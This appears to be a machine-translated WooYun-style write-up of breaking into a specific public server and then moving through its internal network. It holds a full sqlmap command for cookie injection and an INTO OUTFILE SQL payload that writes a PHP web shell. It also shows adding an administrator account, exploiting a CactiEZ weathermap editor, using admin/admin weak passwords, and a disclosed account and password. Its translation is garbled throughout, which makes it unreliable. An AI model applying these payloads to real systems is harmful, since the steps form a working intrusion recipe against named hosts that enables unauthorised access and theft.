Getshell of a certain system (a successful Intranet roaming \ successful getshell of a System)

Getshell of a certain system (a successful Intranet roaming \ successful getshell of a System)

First, a cookie SQL Injection
C: \ Python27 \ sqlmap> sqlmap. py-u "http: // 218.5.173.228: 90/Client/CmxAbout. php "-- cookie" RAS_UserInfo_UserName = wooyun "-- level 3-p RAS_UserInfo_UserName -- dbms = mysql

Getshell

http://*******/bugs/wooyun-2010-0130866

Previous articles. Add 'to the cookie to obtain the absolute path.

 

C:\Program Files (x86)\Comexe\RasMini\rasweb\Apache2\htdocs\Smarty-2.6.19\Client\

Absolute path

Getshell

RAS_UserInfo_UserName = wooyun 'and 1 = 2 union select 0x776F6F79756E3C3F70687020706870696E666F28293B3F3E into outfile 'C:/Program Files (x86) /Comexe/RasMini/rasweb/Apache2/htdocs/smarty-2.6.19/Client/wooyun. php '% 23 can see that the code of the predecessors is

0x776F6F79756E3C3F70687020706870696E666F28293B3F3E

This code is written to Client/wooyun. php.

The hex encryption is used to remove 0x and decrypt it. We can see that it is wooyun.

Written successfully

In

wooyun

Encrypt with hex

Get

Continue directly ~~ Password wooyun 218.5.173.228: 90/Client/wooyun2.php is successfully written.

Cmd view Permissions

Sy permission, directly add the Administrator to find the port, port 91.

Successfully entered

Enable a scanner to scan the Intranet

Detected

http://10.0.10.38

Cms of century internet CactiEZ. Getshell

/Plugins/weathermap/editor. php? Plug = 0 & mapname = sea. php & action = set_map_properties merge m = export m2 = & debug = existing & node_name = & node_x = & node_y = & node_new_name = & node_label = & node_infourl = & node_hover = & node_iconfilename = -- NONE -- & link_name = & region = & link_bandwidth_out = & link_target = & link_width = & link_infourl = & link_hover = & map_title = & map_legend = Traffic + Load & map_stamp = Created: + % B + % d + % Y + % H: % M: % S & Records = 7 & map_linkdefaultbwin = 100 M & Records = 100 M & map_width = 800 & map_height = 600 & map_pngfile = & map_htmlfile = & map_bgfile = -- NONE -- & mapstyle_linklabels = percent & mapstyle_htmlstyle = overlib & mapstyle_a rrowstyle = classic & mapstyle_nodefont = 3 & mapstyle_linkfont = 2 & mapstyle_legendfont = 4 & item_configtext = Name for direct access,

http://10.0.10.38/plugins/weathermap/configs/sea.php

Password 0

I don't know why, but the server cannot connect to a single sentence. This is confusing.

http://10.0.88.91/

I found this again.

Weak Password admin/admin

Successfully entered.

There is another strange phenomenon.

I found that many internal systems are connected to my last SQL injection.

http://*****/bugs/wooyun-2016-0193268

Http: // 10.0.6.19/eassso/login? Service = http % 3A % 2F % 2F10. 0.6.19% 3A6890% 2 Feasportal % 2 FssoWelcome % 3 FredirectTo % 3D % 2Findex_sso.jsp any announcement will jump to release. Not going deep into the server account sea $ password sea